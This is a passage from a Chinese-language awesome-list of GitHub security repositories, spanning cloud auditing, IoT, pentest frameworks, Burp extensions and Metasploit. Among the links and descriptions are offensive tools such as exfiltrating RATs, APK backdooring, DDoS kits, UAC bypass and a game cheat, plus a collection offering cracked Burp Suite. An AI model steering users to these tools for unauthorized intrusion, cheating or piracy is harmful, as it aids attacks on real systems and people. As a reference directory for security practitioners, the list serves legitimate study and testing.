AWS S3 buckets and dump the contents\n- [**844**星][26d] [Py] [jordanpotti/awsbucketdump](https://github.com/jordanpotti/awsbucketdump) 快速枚举 AWS S3 Buckets,查找感兴趣的文件。类似于子域名爆破,但针对S3 Bucket,有额外功能,例如下载文件等\n- [**814**星][7d] [Go] [rebuy-de/aws-nuke](https://github.com/rebuy-de/aws-nuke) Nuke a whole AWS account and delete all its resources.\n- [**804**星][2d] [Py] [awslabs/aws-config-rules](https://github.com/awslabs/aws-config-rules) [Node, Python, Java] Repository of sample Custom Rules for AWS Config.\n- [**786**星][11d] [Go] [liamg/tfsec](https://github.com/liamg/tfsec) \n- [**774**星][13d] [Java] [tmobile/pacbot](https://github.com/tmobile/pacbot) PacBot (Policy as Code Bot)\n- [**613**星][3m] [Py] [netflix/repokid](https://github.com/netflix/repokid) AWS Least Privilege for Distributed, High-Velocity Deployment\n- [**609**星][21d] [Shell] [securityftw/cs-suite](https://github.com/securityftw/cs-suite) Cloud Security Suite - One stop tool for auditing the security posture of AWS/GCP/Azure infrastructure.\n- [**563**星][3m] [Shell] [denizparlak/zeus](https://github.com/denizparlak/zeus) AWS Auditing & Hardening Tool\n- [**548**星][9d] [Ruby] [stelligent/cfn_nag](https://github.com/stelligent/cfn_nag) Linting tool for CloudFormation templates\n- [**539**星][4d] [Py] [salesforce/policy_sentry](https://github.com/salesforce/policy_sentry) IAM Least Privilege Policy Generator\n- [**505**星][3m] [Py] [awslabs/aws-security-benchmark](https://github.com/awslabs/aws-security-benchmark) Open source demos, concept and guidance related to the AWS CIS Foundation framework.\n- [**485**星][19d] [Py] [netflix-skunkworks/diffy](https://github.com/netflix-skunkworks/diffy) Diffy is a triage tool used during cloud-centric security incidents, to help digital forensics and incident response (DFIR) teams quickly identify suspicious hosts on which to focus their response.\n- [**462**星][8m] [Py] [ustayready/fireprox](https://github.com/ustayready/fireprox) AWS API Gateway management tool for creating on the fly HTTP pass-through proxies for unique IP rotation\n- [**409**星][2m] [Ruby] [arkadiyt/aws_public_ips](https://github.com/arkadiyt/aws_public_ips) Fetch all public IP addresses tied to your AWS account. Works with IPv4/IPv6, Classic/VPC networking, and across all AWS services\n- [**400**星][4m] [Py] [duo-labs/cloudtracker](https://github.com/duo-labs/cloudtracker) CloudTracker helps you find over-privileged IAM users and roles by comparing CloudTrail logs with current IAM policies.\n- [**389**星][2m] [Py] [riotgames/cloud-inquisitor](https://github.com/riotgames/cloud-inquisitor) Enforce ownership and data security within AWS\n- [**370**星][11m] [Py] [awslabs/aws-security-automation](https://github.com/awslabs/aws-security-automation) Collection of scripts and resources for DevSecOps and Automated Incident Response Security\n- [**365**星][7m] [Py] [carnal0wnage/weirdaal](https://github.com/carnal0wnage/weirdaal) WeirdAAL (AWS Attack Library)\n- [**343**星][2m] [Ruby] [anaynayak/aws-security-viz](https://github.com/anaynayak/aws-security-viz) Visualize your aws security groups.\n- [**321**星][1y] [Py] [securing/dumpsterdiver](https://github.com/securing/dumpsterdiver) Tool to search secrets in various filetypes.\n- [**292**星][8m] [Py] [cesar-rodriguez/terrascan](https://github.com/cesar-rodriguez/terrascan) Collection of security and best practice test for static code analysis of terraform templates\n- [**289**星][1y] [Py] [nccgroup/aws-inventory](https://github.com/nccgroup/aws-inventory) 发现在AWS账户中创建的资源\n- [**274**星][2m] [Py] [nccgroup/pmapper](https://github.com/nccgroup/pmapper) A tool for quickly evaluating IAM permissions in AWS.\n- [**260**星][11d] [Py] [voulnet/barq](https://github.com/voulnet/barq) The AWS Cloud Post Exploitation framework!\n- [**258**星][14d] [Jupyter Notebook] [aws-samples/aws-security-workshops](https://github.com/aws-samples/aws-security-workshops) A collection of the latest AWS Security workshops\n- [**242**星][6d] [HCL] [nozaq/terraform-aws-secure-baseline](https://github.com/nozaq/terraform-aws-secure-baseline) Terraform module to set up your AWS account with the secure baseline configuration based on CIS Amazon Web Services Foundations.\n- [**224**星][10d] [Dockerfile] [thinkst/canarytokens-docker](https://github.com/thinkst/canarytokens-docker) Docker configuration to quickly setup your own Canarytokens.\n- [**204**星][17d] [stuhirst/awssecurity](https://github.com/stuhirst/awssecurity) for AWS Security material\n- [**203**星][6m] [Py] [dowjones/hammer](https://github.com/dowjones/hammer) Dow Jones Hammer : Protect the cloud with the power of the cloud(AWS)\n\n\n***\n\n\n## Phoenix\n\n\n- [**820**星][5d] [Elixir] [nccgroup/sobelow](https://github.com/nccgroup/sobelow) Phoenix 框架安全方面的静态分析工具(Phoenix 框架:支持对webUI,接口, web性能,mobile app 或 mobile browser 进行自动化测试和监控的平台)\n\n\n***\n\n\n## Kubernetes\n\n\n- [**1895**星][23d] [Py] [aquasecurity/kube-hunter](https://github.com/aquasecurity/kube-hunter) Hunt for security weaknesses in Kubernetes clusters\n- [**582**星][2m] [Go] [shopify/kubeaudit](https://github.com/shopify/kubeaudit) kubeaudit helps you audit your Kubernetes clusters against common security controls\n- [**385**星][2m] [Shell] [kabachook/k8s-security](https://github.com/kabachook/k8s-security) Kubernetes security notes and best practices\n- [**211**星][9m] [Go] [cloudflare/cloudflare-ingress-controller](https://github.com/cloudflare/cloudflare-ingress-controller) A Kubernetes ingress controller for Cloudflare's Argo Tunnels\n\n\n***\n\n\n## Azure\n\n\n\n\n***\n\n\n## Nginx\n\n\n- [**6211**星][2m] [Py] [yandex/gixy](https://github.com/yandex/gixy) Nginx 配置静态分析工具,防止配置错误导致安全问题,自动化错误配置检测\n\n\n***\n\n\n## ELK\n\n\n- [**1945**星][4d] [CSS] [cyb3rward0g/helk](https://github.com/cyb3rward0g/helk) 对ELK栈进行分析,具备多种高级功能,例如SQL声明性语言,图形,结构化流,机器学习等\n\n\n***\n\n\n## GoogleCloud&&谷歌云\n\n\n- [**1066**星][2d] [Py] [forseti-security/forseti-security](https://github.com/forseti-security/forseti-security) A community-driven collection of open source tools to improve the security of your Google Cloud Platform environments\n\n\n# 物联网(IoT)&&嵌入式设备&&路由器&&交换机&&智能设备&&打印机\n\n\n***\n\n\n## 工具\n\n\n### 未分类-IoT\n\n\n- [**1218**星][] [C] [dgiese/dustcloud](https://github.com/dgiese/dustcloud) Xiaomi Smart Home Device Reverse Engineering and Hacking\n- [**1145**星][7m] [nebgnahz/awesome-iot-hacks](https://github.com/nebgnahz/awesome-iot-hacks) A Collection of Hacks in IoT Space so that we can address them (hopefully).\n- [**1049**星][29d] [Py] [ct-open-source/tuya-convert](https://github.com/ct-open-source/tuya-convert) A collection of scripts to flash Tuya IoT devices to alternative firmwares\n- [**836**星][5d] [v33ru/iotsecurity101](https://github.com/v33ru/iotsecurity101) From IoT Pentesting to IoT Security\n- [**587**星][9m] [Py] [woj-ciech/danger-zone](https://github.com/woj-ciech/danger-zone) Correlate data between domains, IPs and email addresses, present it as a graph and store everything into Elasticsearch and JSON files.\n- [**491**星][18d] [Py] [iti/ics-security-tools](https://github.com/iti/ics-security-tools) Tools, tips, tricks, and more for exploring ICS Security.\n- [**461**星][5d] [Py] [rabobank-cdc/dettect](https://github.com/rabobank-cdc/dettect) Detect Tactics, Techniques & Combat Threats\n- [**330**星][1y] [Py] [vmware/liota](https://github.com/vmware/liota) \n- [**315**星][16d] [Java] [erudika/para](https://github.com/erudika/para) Open source back-end server for web, mobile and IoT. The backend for busy developers. (self-hosted or hosted)\n\n\n### 打印机 \n\n\n\n\n### 路由器&&交换机\n\n\n\n\n### 嵌入式设备\n\n\n- [**7547**星][8d] [Py] [threat9/routersploit](https://github.com/threat9/routersploit) Exploitation Framework for Embedded Devices\n\n\n\n\n***\n\n\n## 文章\n\n\n### 新添加\n\n\n\n\n\n\n# 渗透&&offensive&&渗透框架&&后渗透框架\n\n\n***\n\n\n## 工具\n\n\n### 未分类-Pentest\n\n\n- [**3051**星][4m] [Py] [spiderlabs/responder](https://github.com/spiderlabs/responder) LLMNR/NBT-NS/MDNS投毒,内置HTTP/SMB/MSSQL/FTP/LDAP认证服务器, 支持NTLMv1/NTLMv2/LMv2\n- [**2058**星][2m] [C++] [lordnoteworthy/al-khaser](https://github.com/lordnoteworthy/al-khaser) 在野恶意软件使用的技术:虚拟机,仿真,调试器,沙盒检测。\n - 重复区段: [恶意代码->工具](#e2fd0947924229d7de24b9902e1f54a0) |\n- [**1957**星][5d] [chaitin/xray](https://github.com/chaitin/xray) xray 安全评估工具 | 使用之前务必先阅读文档\n- [**1468**星][6d] [C] [ufrisk/pcileech](https://github.com/ufrisk/pcileech) DMA攻击工具。通过 PCIe 硬件设备使用 DMA,直接读写目标系统的内存。目标系统不需要安装驱动。\n- [**1421**星][5m] [yadox666/the-hackers-hardware-toolkit](https://github.com/yadox666/the-hackers-hardware-toolkit) 用于Red Team、渗透、安全研究的最佳硬件产品集合\n- [**1398**星][4d] [Py] [ekultek/whatwaf](https://github.com/ekultek/whatwaf) 检测并绕过WAF和保护系统\n- [**1223**星][4m] [Py] [owtf/owtf](https://github.com/owtf/owtf) 进攻性 Web 测试框架。着重于 OWASP + PTES,尝试统合强大的工具,提高渗透测试的效率。大部分以Python 编写\n- [**1020**星][1m] [C] [bt3gl/pentesting-toolkit](https://github.com/bt3gl/Pentesting-Toolkit) 渗透测试,CTF和战争游戏的工具收集\n- [**952**星][4m] [Py] [hatriot/zarp](https://github.com/hatriot/zarp) 网络攻击工具,主要是本地网络攻击\n- [**938**星][2m] [Py] [d4vinci/one-lin3r](https://github.com/d4vinci/one-lin3r) 轻量级框架,提供在渗透测试中需要的所有one-liners\n- [**850**星][8m] [JS] [serpicoproject/serpico](https://github.com/serpicoproject/serpico) 渗透测试报告生成和协作工具\n- [**820**星][2m] [Py] [jeffzh3ng/fuxi](https://github.com/jeffzh3ng/fuxi) 渗透测试平台\n- [**809**星][17d] [Py] [jivoi/pentest](https://github.com/jivoi/pentest) 渗透测试工具\n- [**775**星][8m] [Py] [gkbrk/slowloris](https://github.com/gkbrk/slowloris) HTTP DoS 服务攻击,主要影响多线程服务器\n- [**722**星][19d] [voorivex/pentest-guide](https://github.com/voorivex/pentest-guide) 基于OWASP的渗透测试指南,包括测试案例,资源和示例。\n- [**713**星][6m] [leezj9671/pentest_interview](https://github.com/leezj9671/pentest_interview) 个人准备渗透测试和安全面试的经验之谈,和去部分厂商的面试题,干货真的满满~\n- [**685**星][4d] [Py] [gwen001/pentest-tools](https://github.com/gwen001/pentest-tools) 日常使用的渗透工具集合\n- [**624**星][10m] [Py] [epsylon/ufonet](https://github.com/epsylon/ufonet) 用于发起DDoS和DoS攻击的工具包。\n- [**613**星][1m] [Ruby] [hackplayers/evil-winrm](https://github.com/hackplayers/evil-winrm) 用户Hacking/渗透的终极WinRM shell\n- [**545**星][t] [C++] [danielkrupinski/osiris](https://github.com/danielkrupinski/osiris) 开源培训软件/“反恐精英:全球攻势”游戏作弊工具。设计为内部作弊-可将动态链接库(DLL)加载到游戏过程中\n- [**514**星][25d] [PS] [s3cur3th1ssh1t/winpwn](https://github.com/S3cur3Th1sSh1t/WinPwn) 内部Windows渗透测试/与安全的自动化\n- [**502**星][7d] [netbiosx/checklists](https://github.com/netbiosx/checklists) 参与的各种渗透测试的清单\n- [**491**星][1y] [Shell] [leonteale/pentestpackage](https://github.com/leonteale/pentestpackage) 一整套我已经制作或经常使用的渗透脚本\n- [**489**星][11m] [Ruby] [sidaf/homebrew-pentest](https://github.com/sidaf/homebrew-pentest) 一个包含一些Homebrew formulas的Tap,包含与渗透测试相关的工具。\n- [**474**星][8m] [Java] [alpha1e0/pentestdb](https://github.com/alpha1e0/pentestdb) WEB渗透测试数据库\n- [**472**星][11m] [PHP] [l3m0n/pentest_tools](https://github.com/l3m0n/pentest_tools) 收集一些小型实用的工具\n- [**464**星][3m] [C++] [fsecurelabs/c3](https://github.com/FSecureLABS/C3) 一个用于快速定制C2通道原型的框架,同时仍提供与现有攻击性工具包的集成。\n- [**463**星][4m] [mel0day/redteam-bcs](https://github.com/mel0day/redteam-bcs) BCS(北京网络安全大会)2019 红队行动会议重点内容\n\n- [**451**星][8m] [C++] [rek7/mxtract](https://github.com/rek7/mxtract) 一个基于linux的开源工具,用于分析和转储内存。\n- [**440**星][2m] [Py] [admintony/prepare-for-awd](https://github.com/admintony/prepare-for-awd) AWD攻防赛脚本集合\n- [**435**星][10m] [Go] [amyangxyz/assassingo](https://github.com/amyangxyz/assassingo) 一个可扩展的并发信息收集和漏洞扫描框架,具有基于WebSocket的Web GUI。\n- [**403**星][2d] [Py] [christruncer/pentestscripts](https://github.com/christruncer/pentestscripts) 渗透脚本\n- [**401**星][2m] [Py] [clr2of8/dpat](https://github.com/clr2of8/dpat) 域密码审核工具\n- [**396**星][4m] [ansjdnakjdnajkd/ios](https://github.com/ansjdnakjdnajkd/ios) iOS渗透测试最有用的工具\n- [**395**星][8d] [PS] [d0nkeys/redteam](https://github.com/d0nkeys/redteam) Red Team 脚本\n- [**394**星][1y] [Py] [cr4shcod3/pureblood](https://github.com/cr4shcod3/pureblood) 为黑客/渗透测试/漏洞赏金创建的渗透测试框架\n- [**392**星][4m] [Py] [xuanhun/pythonhackingbook1](https://github.com/xuanhun/pythonhackingbook1) Python黑客编程之极速入门\n\n- [**387**星][5m] [C#] [bitsadmin/nopowershell](https://github.com/bitsadmin/nopowershell) 使用C#\"重写\"的PowerShell, 支持执行与PowerShell类似的命令, 然而对所有的PowerShell日志机制都不可见\n- [**381**星][9m] [C] [ridter/pentest](https://github.com/ridter/pentest) 渗透工具\n- [**379**星][7m] [unprovable/pentesthardware](https://github.com/unprovable/pentesthardware) 公开笔记整理\n- [**353**星][1y] [PS] [rootclay/powershell-attack-guide](https://github.com/rootclay/powershell-attack-guide) Powershell攻击指南----黑客后渗透之道\n\n- [**351**星][3m] [Shell] [maldevel/pentestkit](https://github.com/maldevel/pentestkit) 渗透脚本和工具\n- [**347**星][1m] [Py] [ym2011/pest](https://github.com/ym2011/PEST) 渗透脚本\n- [**346**星][11m] [Py] [darkspiritz/darkspiritz](https://github.com/darkspiritz/darkspiritz) 适用于Linux,MacOS和Windows系统的渗透测试框架。\n- [**344**星][1m] [stardustsky/saidict](https://github.com/stardustsky/saidict) 弱口令,敏感目录,敏感文件等渗透测试常用攻击字典\n\n- [**340**星][1y] [Java] [rub-nds/ws-attacker](https://github.com/rub-nds/ws-attacker) Web服务渗透测试框架,模块化。\n- [**331**星][1m] [Py] [m8r0wn/nullinux](https://github.com/m8r0wn/nullinux) SMB null 会话识别和枚举工具\n- [**323**星][3m] [PS] [kmkz/pentesting](https://github.com/kmkz/pentesting) 渗透测试技巧\n- [**322**星][4m] [HTML] [koutto/jok3r](https://github.com/koutto/jok3r) 一个Python3 CLI应用程序,旨在帮助渗透测试人员进行网络基础结构和Web黑盒安全性测试。\n- [**310**星][7m] [ring04h/pentest](https://github.com/ring04h/pentest) 渗透测试用到的东东\n\n- [**305**星][3m] [Ruby] [fozavci/viproy-voipkit](https://github.com/fozavci/viproy-voipkit) VoIP渗透测试工具和 Metasploit 框架\n - 重复区段: [渗透->工具->Metasploit->未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) |\n- [**297**星][2m] [Py] [bishopfox/eyeballer](https://github.com/bishopfox/eyeballer) 用于大型网络渗透测试中需要从大量基于Web的主机中找到“有趣的”目标\n- [**295**星][2m] [Lua] [pentesteracademy/patoolkit](https://github.com/pentesteracademy/patoolkit) 一组流量分析插件,用于将Wireshark的功能从微分析工具和协议解析器扩展到宏分析器和威胁猎人。\n- [**289**星][5d] [Java] [mr-xn/penetration_testing_poc](https://github.com/mr-xn/penetration_testing_poc) 渗透测试有关的POC、EXP、脚本、提权、小工具等\n- [**287**星][1y] [C++] [paranoidninja/pandoras-box](https://github.com/paranoidninja/pandoras-box) 渗透和Red Team脚本\n- [**280**星][12d] [Go] [rmikehodges/hidensneak](https://github.com/rmikehodges/hidensneak) 通过提供快速部署,管理和关闭各种云服务的界面,协助管理渗透测试人员的攻击基础架构\n- [**273**星][19d] [Py] [elevenpaths/homepwn](https://github.com/elevenpaths/homepwn) HomePwn - Swiss Army Knife for Pentesting of IoT Devices\n- [**262**星][4m] [Py] [giantbranch/python-hacker-code](https://github.com/giantbranch/python-hacker-code) 《python黑帽子:黑客与渗透测试编程之道》代码及实验文件,字典等\n\n- [**259**星][1m] [anyeduke/enterprise-security-skill](https://github.com/anyeduke/enterprise-security-skill) 用于记录企业安全规划,建设,运营,攻防的相关资源\n\n- [**250**星][5d] [PS] [sdcampbell/internal-pentest-playbook](https://github.com/sdcampbell/internal-pentest-playbook) Internal Network Penetration Test Playbook\n- [**246**星][3m] [Shell] [leviathan36/kaboom](https://github.com/leviathan36/kaboom) An automated pentest tool\n- [**231**星][9m] [Go] [stevenaldinger/decker](https://github.com/stevenaldinger/decker) Declarative penetration testing orchestration framework\n- [**220**星][] [JS] [giper45/dockersecurityplayground](https://github.com/giper45/dockersecurityplayground) A Microservices-based framework for the study of Network Security and Penetration Test techniques\n- [**219**星][6m] [Py] [mgeeky/tomcatwardeployer](https://github.com/mgeeky/tomcatwardeployer) Apache Tomcat auto WAR deployment & pwning penetration testing tool.\n- [**206**星][3m] [Shell] [keepwannabe/remot3d](https://github.com/keepwannabe/remot3d) is a simple tool created for large pentesters as well as just for the pleasure of defacers to control server by backdoors\n- [**203**星][2m] [Ruby] [vonahisec/leprechaun](https://github.com/vonahisec/leprechaun) This tool is used to map out the network data flow to help penetration testers identify potentially valuable targets.\n- [**200**星][11m] [Py] [infamoussyn/rogue](https://github.com/infamoussyn/rogue) An extensible toolkit providing penetration testers an easy-to-use platform to deploy Access Points during penetration testing and red team engagements.\n\n\n### 收集\n\n\n- [**923**星][9m] [C] [0x90/wifi-arsenal](https://github.com/0x90/wifi-arsenal) WiFi arsenal\n- [**822**星][3m] [Shell] [shr3ddersec/shr3dkit](https://github.com/shr3ddersec/shr3dkit) Red Team Tool Kit\n- [**540**星][7m] [Py] [0xdea/tactical-exploitation](https://github.com/0xdea/tactical-exploitation) 渗透测试辅助工具包. Python/PowerShell脚本\n\n\n### 渗透多合一&&渗透框架\n\n\n- [**5062**星][5m] [PS] [empireproject/empire](https://github.com/EmpireProject/Empire) 后渗透框架. Windows客户端用PowerShell, Linux/OSX用Python. 之前PowerShell Empire和Python EmPyre的组合\n- [**4752**星][13d] [Py] [manisso/fsociety](https://github.com/manisso/fsociety) fsociety Hacking Tools Pack – A Penetration Testing Framework\n- [**3427**星][1m] [PS] [samratashok/nishang](https://github.com/samratashok/nishang) 渗透框架,脚本和Payload收集,主要是PowerShell,涵盖渗透的各个阶段\n- [**3154**星][t] [Shell] [1n3/sn1per](https://github.com/1n3/sn1per) 自动化渗透测试框架\n- [**3136**星][2m] [Py] [byt3bl33d3r/crackmapexec](https://github.com/byt3bl33d3r/crackmapexec) 后渗透工具,自动化评估大型Active Directory网络的安全性\n- [**2995**星][18d] [Py] [guardicore/monkey](https://github.com/guardicore/monkey) 自动化渗透测试工具, 测试数据中心的弹性, 以防范周边(perimeter)泄漏和内部服务器感染\n- [**2840**星][8m] [C#] [quasar/quasarrat](https://github.com/quasar/quasarrat) Remote Administration Tool for Windows\n- [**2421**星][5d] [Py] [infobyte/faraday](https://github.com/infobyte/faraday) 渗透测试和漏洞管理平台\n- [**1527**星][19d] [Py] [zerosum0x0/koadic](https://github.com/zerosum0x0/koadic) 类似于Meterpreter、Powershell Empire 的post-exploitation rootkit,区别在于其大多数操作都是由 Windows 脚本主机 JScript/VBScript 执行\n- [**1096**星][11m] [Py] [secforce/sparta](https://github.com/secforce/sparta) 网络基础架构渗透测试\n- [**961**星][4m] [Py] [0xinfection/tidos-framework](https://github.com/0xInfection/TIDoS-Framework) Web App渗透测试框架, 攻击性, 手动\n- [**928**星][1y] [Py] [m4n3dw0lf/pythem](https://github.com/m4n3dw0lf/pythem) 多功能渗透测试框架\n- [**521**星][t] [Py] [gyoisamurai/gyoithon](https://github.com/gyoisamurai/gyoithon) 使用机器学习的成长型渗透测试工具\n\n\n### 自动化\n\n\n- [**1881**星][5m] [Shell] [arismelachroinos/lscript](https://github.com/arismelachroinos/lscript) 自动化无线渗透和Hacking 任务的脚本\n - 重复区段: [无线->未分类-WiFi](#d4efda1853b2cb0909727188116a2a8c) |\n- [**1792**星][t] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener\n - 重复区段: [渗透->工具->Metasploit->未分类-metasploit](#01be61d5bb9f6f7199208ff0fba86b5d) |[侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |[Payload->工具->Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) |\n- [**1688**星][3m] [Py] [rootm0s/winpwnage](https://github.com/rootm0s/winpwnage) UAC bypass, Elevate, Persistence and Execution methods\n\n\n### 数据渗透&&DataExfiltration\n\n\n- [**1065**星][1m] [C] [quiet/quiet](https://github.com/quiet/quiet) Transmit data with sound. Includes binaries for soundcards and .wav files.\n- [**469**星][4m] [Py] [viralmaniar/powershell-rat](https://github.com/viralmaniar/powershell-rat) Python based backdoor that uses Gmail to exfiltrate data through attachment. This RAT will help during red team engagements to backdoor any Windows machines. It tracks the user activity using screen capture and sends it to an attacker as an e-mail attachment.\n\n\n### 横向渗透\n\n\n\n\n### Burp\n\n\n#### 收集\n\n\n- [**1982**星][1y] [BitBake] [1n3/intruderpayloads](https://github.com/1n3/intruderpayloads) A collection of Burpsuite Intruder payloads, BurpBounty payloads, fuzz lists, malicious file uploads and web pentesting methodologies and checklists.\n- [**1108**星][2m] [snoopysecurity/awesome-burp-extensions](https://github.com/snoopysecurity/awesome-burp-extensions) Burp扩展收集\n\n\n#### 未分类-Burp\n\n\n- [**1112**星][1y] [Py] [bugcrowd/hunt](https://github.com/bugcrowd/HUNT) Burp和ZAP的扩展收集\n- [**917**星][5d] [Batchfile] [mr-xn/burpsuite-collections](https://github.com/mr-xn/burpsuite-collections) BurpSuite收集:包括不限于 Burp 文章、破解版、插件(非BApp Store)、汉化等相关教程,欢迎添砖加瓦---burpsuite-pro burpsuite-extender burpsuite cracked-version hackbar hacktools fuzzing fuzz-testing burp-plugin burp-extensions bapp-store brute-force-attacks brute-force-passwords waf sqlmap jar\n- [**715**星][1y] [Java] [d3vilbug/hackbar](https://github.com/d3vilbug/hackbar) HackBar plugin for Burpsuite\n- [**663**星][9m] [Java] [vulnerscom/burp-vulners-scanner](https://github.com/vulnerscom/burp-vulners-scanner) Vulnerability scanner based on vulners.com search API\n- [**605**星][9m] [Java] [c0ny1/chunked-coding-converter](https://github.com/c0ny1/chunked-coding-converter) Burp suite 分块传输辅助插件\n- [**584**星][1y] [Java] [federicodotta/brida](https://github.com/federicodotta/brida) The new bridge between Burp Suite and Frida!\n- [**510**星][2m] [Java] [wagiro/burpbounty](https://github.com/wagiro/burpbounty) Burp Bounty (Scan Check Builder in BApp Store) is a extension of Burp Suite that allows you, in a quick and simple way, to improve the active and passive scanner by means of personalized rules through a very intuitive graphical interface.\n- [**496**星][2m] [Py] [romanzaikin/burpextension-whatsapp-decryption-checkpoint](https://github.com/romanzaikin/burpextension-whatsapp-decryption-checkpoint) This tool was created during our research at Checkpoint Software Technologies on Whatsapp Protocol (This repository will be updated after BlackHat 2019)\n- [**445**星][6m] [Py] [albinowax/activescanplusplus](https://github.com/albinowax/activescanplusplus) ActiveScan++ Burp Suite Plugin\n- [**423**星][5m] [Java] [bit4woo/recaptcha](https://github.com/bit4woo/recaptcha) reCAPTCHA = REcognize CAPTCHA: A Burp Suite Extender that recognize CAPTCHA and use for intruder payload 自动识别图形验证码并用于burp intruder爆破模块的插件\n- [**410**星][8m] [Java] [nccgroup/burpsuitehttpsmuggler](https://github.com/nccgroup/burpsuitehttpsmuggler) A Burp Suite extension to help pentesters to bypass WAFs or test their effectiveness using a number of techniques\n- [**381**星][1y] [Py] [rhinosecuritylabs/sleuthql](https://github.com/rhinosecuritylabs/sleuthql) Python3 Burp History parsing tool to discover potential SQL injection points. To be used in tandem with SQLmap.\n- [**378**星][3m] [Java] [nccgroup/autorepeater](https://github.com/nccgroup/autorepeater) Automated HTTP Request Repeating With Burp Suite\n- [**366**星][13d] [Java] [portswigger/http-request-smuggler](https://github.com/PortSwigger/http-request-smuggler) an extension for Burp Suite designed to help you launch HTTP Request Smuggling attack\n- [**364**星][4d] [Kotlin] [portswigger/turbo-intruder](https://github.com/portswigger/turbo-intruder) Turbo Intruder is a Burp Suite extension for sending large numbers of HTTP requests and analyzing the results.\n- [**359**星][5m] [Java] [bit4woo/domain_hunter](https://github.com/bit4woo/domain_hunter) A Burp Suite Extender that try to find sub-domain, similar-domain and related-domain of an organization, not only a domain! 利用burp收集整个企业、组织的域名(不仅仅是单个主域名)的插件\n- [**336**星][13d] [Java] [bit4woo/knife](https://github.com/bit4woo/knife) A burp extension that add some useful function to Context Menu 添加一些右键菜单让burp用起来更顺畅\n- [**310**星][1y] [Java] [ebryx/aes-killer](https://github.com/ebryx/aes-killer) Burp plugin to decrypt AES Encrypted traffic of mobile apps on the fly\n- [**303**星][6d] [Java] [ilmila/j2eescan](https://github.com/ilmila/j2eescan) J2EEScan is a plugin for Burp Suite Proxy. The goal of this plugin is to improve the test coverage during web application penetration tests on J2EE applications.\n- [**301**星][1y] [Java] [elkokc/reflector](https://github.com/elkokc/reflector) Burp 插件,浏览网页时实时查找反射 XSS\n- [**299**星][1y] [Java] [vmware/burp-rest-api](https://github.com/vmware/burp-rest-api) REST/JSON API to the Burp Suite security tool.\n- [**298**星][12m] [Shell] [yw9381/burp_suite_doc_zh_cn](https://github.com/yw9381/burp_suite_doc_zh_cn) 这是基于Burp Suite官方文档翻译而来的中文版文档\n- [**273**星][2m] [Py] [quitten/autorize](https://github.com/quitten/autorize) Automatic authorization enforcement detection extension for burp suite written in Jython developed by Barak Tawily in order to ease application security people work and allow them perform an automatic authorization tests\n- [**257**星][3m] [Py] [rhinosecuritylabs/iprotate_burp_extension](https://github.com/rhinosecuritylabs/iprotate_burp_extension) Extension for Burp Suite which uses AWS API Gateway to rotate your IP on every request.\n- [**250**星][30d] [Java] [c0ny1/jsencrypter](https://github.com/c0ny1/jsencrypter) 一个用于加密传输爆破的Burp Suite插件\n- [**246**星][5m] [Py] [initroot/burpjslinkfinder](https://github.com/initroot/burpjslinkfinder) Burp Extension for a passive scanning JS files for endpoint links.\n- [**244**星][3m] [Java] [c0ny1/passive-scan-client](https://github.com/c0ny1/passive-scan-client) Burp被动扫描流量转发插件\n- [**238**星][2m] [Java] [samlraider/samlraider](https://github.com/samlraider/samlraider) SAML2 Burp Extension\n- [**235**星][1y] [Java] [difcareer/sqlmap4burp](https://github.com/difcareer/sqlmap4burp) sqlmap embed in burpsuite\n- [**230**星][1y] [Py] [audibleblink/doxycannon](https://github.com/audibleblink/doxycannon) 为一堆OpenVPN文件分别创建Docker容器, 每个容器开启SOCKS5代理服务器并绑定至Docker主机端口, 再结合使用Burp或ProxyChains, 构建私有的Botnet\n- [**225**星][6m] [Perl] [modzero/mod0burpuploadscanner](https://github.com/modzero/mod0burpuploadscanner) HTTP file upload scanner for Burp Proxy\n- [**219**星][9m] [Py] [teag1e/burpcollector](https://github.com/teag1e/burpcollector) 通过BurpSuite来构建自己的爆破字典,可以通过字典爆破来发现隐藏资产。\n- [**209**星][3m] [Java] [h3xstream/http-script-generator](https://github.com/h3xstream/http-script-generator) ZAP/Burp plugin that generate script to reproduce a specific HTTP request (Intended for fuzzing or scripted attacks)\n\n\n\n\n### Metasploit\n\n\n#### 未分类-metasploit\n\n\n- [**19127**星][4d] [Ruby] [rapid7/metasploit-framework](https://github.com/rapid7/metasploit-framework) Metasploit Framework\n- [**1792**星][t] [Shell] [leebaird/discover](https://github.com/leebaird/discover) 自定义的bash脚本, 用于自动化多个渗透测试任务, 包括: 侦查、扫描、解析、在Metasploit中创建恶意Payload和Listener\n - 重复区段: [渗透->工具->自动化](#fc8737aef0f59c3952d11749fe582dac) |[侦察->工具->未分类-OSINT](#05ab1b75266fddafc7195f5b395e4d99) |[Payload->工具->Payload生成](#ad92f6b801a18934f1971e2512f5ae4f) |\n- [**1302**星][1y] [Shell] [dana-at-cp/backdoor-apk](https://github.com/dana-at-cp/backdoor-apk) backdoor-apk is a shell script that simplifies the process of adding a backdoor to any Android APK file. Users of this shell script should have working knowledge of Linux, Bash, Metasploit, Apktool, the Android SDK, smali, etc. This shell script is provided as-is without warranty of any kind and is intended for educational purposes only.\n- [**742**星][16d] [C] [rapid7/metasploit-payloads](https://github.com/rapid7/metasploit-payloads) Unified repository for different Metasploit Framework payloads\n- [**732**星][3m] [Java] [isafeblue/trackray](https://github.com/isafeblue/trackray) 溯光 (TrackRay) 3 beta⚡渗透测试框架(资产扫描|指纹识别|暴力破解|网页爬虫|端口扫描|漏洞扫描|代码审计|AWVS|NMAP|Metasploit|SQLMap)\n- [**534**星][4d] [Shell] [r00t-3xp10it/venom](https://github.com/r00t-3xp10it/venom) venom - shellcode generator/compiler/handler (metasploit)\n- [**456**星][5m] [Py] [cchio/deep-pwning](https://github.com/cchio/deep-pwning) 一个轻量级的框架,用于试验机器学习模型,目的是评估其对主动攻击者的鲁棒性\n- [**413**星][6m] [Ruby] [praetorian-code/purple-team-attack-automation](https://github.com/praetorian-code/purple-team-attack-automation) Praetorian's public release of our Metasploit automation of MITRE ATT&CK™ TTPs\n- [**310**星][2m] [Py] [3ndg4me/autoblue-ms17-010](https://github.com/3ndg4me/autoblue-ms17-010) This is just an semi-automated fully working, no-bs, non-metasploit version of the public exploit code for MS17-010\n- [**310**星][11m] [Ruby] [darkoperator/metasploit-plugins](https://github.com/darkoperator/metasploit-plugins) Plugins for Metasploit Framework\n- [**305**星][3m] [Ruby] 